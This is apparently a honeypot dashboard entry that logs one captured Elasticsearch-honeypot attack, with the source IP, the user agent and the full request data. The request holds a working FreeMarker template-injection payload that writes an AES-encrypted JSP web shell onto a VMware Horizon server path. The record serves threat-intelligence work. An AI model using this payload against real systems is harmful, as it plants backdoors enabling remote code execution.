Dashboard
IP Addresses

Attribution & Reputation
SSH Honeypots

Attackers

Commands

Proxy Requests

Malware Drops
HTTP Honeypots

Attackers
Elasticsearch Honeypots

Attackers
FTP Honeypots

Attackers

Attack 7ffc1062-d45b-4f25-8b9b-44179a312541

Details

ID	7ffc1062-d45b-4f25-8b9b-44179a312541
Attack Type	elasticsearch
IP Address	75.127.11.24
Username
Password
Client Version	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40
Country	United States
Date	2023-06-04 08:48PM

Request Data

{
   "path": "",
   "method": "GET",
   "headers": {
     "Accept": "*/*",
     "Connection": "keep-alive",
     "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36 Edg/95.0.1020.40",
     "Accept-Encoding": "gzip, deflate"
   },
   "hostname": "localhost",
   "form_data": {
     "code": "",
     "deviceUdid": "${\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.io.FileOutputStream\",\"/opt/vmware/horizon/workspace/webapps/SAAS/jersey/manager/api/images/2907/CyxXnVQ.jsp\").write(\"freemarker.template.utility.ObjectConstructor\"?new()(\"java.lang.String\",\"%0A++++++++%3C%25%40page+import%3D%5C%22java.util.%2A%2Cjavax.crypto.%2A%2Cjavax.crypto.spec.%2A%5C%22%25%3E%0A++++++++++++++++%3C%25%21%0A++++++++++++++++++class+U+extends+ClassLoader%7B%0A++++++++++++++++++++++U%28ClassLoader+c%29+%7B%0A++++++++++++++++++++++super%28c%29%3B%0A++++++++++++++++++++++%7D%0A++++++++++++++++%0A++++++++++++++++++++++public+Class+g%28byte+%5B%5Db%29+%7B%0A++++++++++++++++++++++++return+super.defineClass%28b%2C0%2Cb.length%29%3B%0A++++++++++++++++++++++%7D%0A++++++++++++++++%7D%25%3E%3C%25%0A++++++++++++++++++if+%28request.getMethod%28%29.equals%28%5C%22POST%5C%22%29%29%7B%0A+++++++++++++++++++++++String+k%3D%5C%22e45e329feb5d925b%5C%22%3B%0A+++++++++++++++++++++++session.putValue%28%5C%22u%5C%22%2Ck%29%3B%0A+++++++++++++++++++++++Cipher+c%3DCipher.getInstance%28%5C%22AES%5C%22%29%3B%0A+++++++++++++++++++++++c.init%282%2Cnew+SecretKeySpec%28k.getBytes%28%29%2C%5C%22AES%5C%22%29%29%3B%0A+++++++++++++++++++++++new+U%28this.getClass%28%29.getClassLoader%28%29%29.g%28c.doFinal%28new+sun.misc.BASE64Decoder%28%29.decodeBuffer%28request.getReader%28%29.readLine%28%29%29%29%29.newInstance%28%29.equals%28pageContext%29%3B%7D%0A++++++++++++++++%25%3E%0A++++++++++++++++%3C%25out.println%28%5C%22e8418d1d706cd73548f9f16f1d55ad6e%5C%22%29+%3B%25%3E\").getBytes())}"
   }
 }